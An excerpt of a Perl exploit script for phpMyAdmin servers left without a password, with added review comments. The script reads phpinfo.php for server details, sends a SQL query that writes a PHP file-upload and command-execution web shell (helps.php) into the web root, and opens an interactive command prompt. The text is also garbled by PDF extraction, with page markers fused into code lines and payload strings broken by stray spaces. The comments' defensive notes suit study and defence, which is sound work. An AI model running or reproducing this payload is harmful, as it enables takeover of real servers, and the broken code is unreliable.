print q{
Exploit for phpMyAdmin Null password
Usage: perl PMANull.pl <site> <path> <do>
Example: perl PMANull.pl www.target.com / 0 };
exit;
}
# --- Excerpt of a phpMyAdmin exploit script, recovered from a PDF ---
# NOTE(review): the "Trang N" tokens fused into four lines of this excerpt
# ("Trang" = "Page") are page markers from the source document, not Perl, and
# several literals were re-wrapped by the extraction, so this text is not
# runnable as-is.  No `use strict`, `use warnings` or `use IO::Socket::INET` is
# visible here; they may appear above this excerpt.
# Arguments: $ARGV[0] = host, $ARGV[1] = phpMyAdmin web path, $ARGV[2] = mode
# (0 = discovery + injection + command loop, 1 = discovery + injection then
# exit, 2 = straight to the command loop; see the $id checks below).
$ip = $ARGV[0];
$http = $ARGV[1];
# Strip a leading "http://" from the host.  The /e flag evaluates the (empty)
# replacement as code, which has no effect here.
$ip =~ s/(http:\/\/)//eg;
$id = $ARGV[2];
# Path for the first request; this discards the $ARGV[1] value read above.
$http = "phpinfo.php";
$num = 0;                       # number of phpinfo() fields recognised below
# Mode 2 skips discovery and injection and jumps to the CMDS label further down.
if($id==2) { goto CMDS; }
# Leftover from an earlier revision: the assignment is commented out, so the
# string literal on the following line is a statement with no effect.
Trang 2#$data =
"username=andrejiao&from_url=%3C%7Bfrom_url%7D%3E&submit=Send+%3 E+%3E";
#$idata = (length($data));
# Plain TCP to port 80 (no TLS); dies if the connection cannot be made.
$socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80')
or die"[-] Couldn't connect!\n";
print "[+] Connected!\n";
# httpcon() is defined outside this excerpt; presumably it writes an HTTP
# request (method, Host, path, body) to the socket -- confirm against its
# definition.  The meaning of the "!" body passed for the GET is not shown here.
httpcon($socks,"GET",$ip,$http,"!");
print "[+] Exploiting Target \r\n";
# Scrape the phpinfo() HTML line by line.  The first two patterns each span two
# lines of this excerpt (wrapped by extraction).  From a defender's view an
# exposed phpinfo.php is the information source for everything collected here
# (OS string, safe_mode, and the on-disk script directory).
while($ans = <$socks>){
if($ans =~ /<tr><td class="e">System <\/td><td
class="v">(.*)<\/td><\/tr>/) {
print "[+] System Info: $1\r\n";
$num++;
}
if($ans =~ /<tr><td class="e">safe_mode<\/td><td
class="v">(.*)<\/td><td class="v">/){
print "[+] Safe Mode: $1\r\n";
$num++;
Trang 3}
# SCRIPT_FILENAME yields the filesystem directory of phpinfo.php; it is used as
# the output directory of the INTO OUTFILE query below.
if($ans =~ /_SERVER\["SCRIPT_FILENAME"\]<\/td><td class="v">(.*)\/phpinfo.php<\/td>/){
print "[+] Path: $1\r\n";
$path = $1;
$num++;
}
}
# Fewer than three fields recognised and no path found: ask interactively.
# Note the single quotes on the first prompt: "\r\n" is printed literally rather
# than as a line ending.  The path typed at the prompt is used as read.
if(($num<3) && (!defined($path))) {
print 'PHPInfo.php was not found\r\n';
print 'Would you like to continue <Y/N>:';
$tah = <STDIN>;
chomp($tah);
if($tah eq "Y") {
print 'Please insert script path:';
$path = <STDIN>;
} else {
die "[+] Bye!\r\n";
}
}
# URL-encoded form body for phpMyAdmin's SQL-execution endpoint.  The sql_query
# field creates a temporary table, inserts a PHP upload/command page into it,
# writes it out with SELECT ... INTO OUTFILE under $path, and drops the table.
# This depends on phpMyAdmin accepting the request without credentials (the
# "null password" of the title) and on the MySQL account holding the FILE
# privilege.  Defensive notes: a POST to read_dump.php carrying "INTO OUTFILE"
# / "CREATE TABLE" from an unauthenticated client, and a new .php file appearing
# in the web root, are the observable artefacts; requiring a password for the
# phpMyAdmin login and restricting FILE / secure_file_priv remove the
# precondition.  The literal was re-wrapped by extraction (stray spaces inside
# "db_ details.php", "pre v_sql_query", "hel ps" and "MAX_FILE_S IZE").
Trang 4$idata =
"is_js_confirmed=0&lang=en-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&pos=0&goto=db_ details.php&zero_rows=Your+SQL+query+has+been+executed+successfully&pre v_sql_query=&sql_query=use+mysql%3B%0D%0ACREATE+TABLE+temptab+
%28codetab+text%29%3B%0D%0AINSERT+INTO+temptab+%28codetab%29+ values+%28%27%3CFORM+ENCTYPE%3D%22multipart%2Fform%2Ddata%2 2+ACTION%3D%22helps%2Ephp%22+METHOD%3D%22POST%22%3E%3CI NPUT+TYPE%3D%22hidden%22+name%3D%22MAX%5FFILE%5FSIZE%22 +value%3D%22100000%22%3EUpload+this+file%3A+%3CINPUT+NAME%3D
%22userfile%22+TYPE%3D%22file%22%3E%3CINPUT+TYPE%3D%22submit
%22+VALUE%3D%22Send%22%3E%3C%2FFORM%3E%3C%3Fphp+move% 5Fuploaded%5Ffile%28%24userfile%2C+%22entrika%2Ephp%22%29%3B+%3F
%3E%3C%3Fphp+if+%28%21empty%28%24%5FGET%5B%22c%22%5D%29
%29+%7B+echo+%22%3Cpre%3E%22%3B+system%28%24%5FGET%5B%22c
%22%5D%29%3B+echo+%22%3C%2Fpre%3E%22%3B+%7D+exit%3B+%3F
%3E%27%29%3B%0D%0ASELECT+%2A+INTO+OUTFILE+%27$path%2Fhel ps%2Ephp%27+from+temptab%3B%0D%0ADROP+TABLE+temptab%3B%0D
%0AFLUSH+LOGS%3B+&show_query=1&SQL=Go&sql_file=&MAX_FILE_S IZE=16777216&sql_file_compression&charset_of_file=utf8";
$http = $ARGV[1];               # discarded by the next line
$http = "read_dump.php";        # phpMyAdmin SQL-import endpoint for the POST
#$http = "import.php";
# Second connection for the POST (the first socket was read to EOF above).
$socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80')
or die"[-] Couldn't connect!\n";
httpcon($socks,"POST",$ip,$http,$idata);
# Scan the response for phpMyAdmin's error block.  $sqlerror is not
# initialised anywhere in this excerpt; its states are: 1 once
# "<p><b>Error</b></p>" is seen, 2 from the following "<pre>", then every line
# in state 2 is echoed until "</pre>", at which point the script dies.
Trang 5while($ans = <$socks>){
if($ans =~ /<p><b>Error<\/b><\/p>/){
print "[-] Error was found!\r\n";
$sqlerror = 1;
}
if(($sqlerror==2) && ($ans =~ /<\/pre>/)){ $sqlerror=0; die "[-] Error!\r\n"; }
if($sqlerror==2){ print "[-] Error: $ans"; }
if(($sqlerror==1) && ($ans =~ /<pre>/)){ $sqlerror=2; } }
# Reports the URL using $ARGV[1] (the web path given on the command line),
# not the filesystem $path discovered above.
print "[+] Shell Injected: $ip/$ARGV[1]/helps.php";
# Mode 1 stops after injection; mode 0 falls through to the CMDS loop below.
if($id==1) { die "[+] Bye!\r\n"; }
CMDS:
while (1){
$cout = 0;
print "\r\nCMD> ";
$cmd = <STDIN>;
chomp($cmd);
if(($cmd eq 'anquit') || (!defined($cmd))){
die "[+] Bye!";
}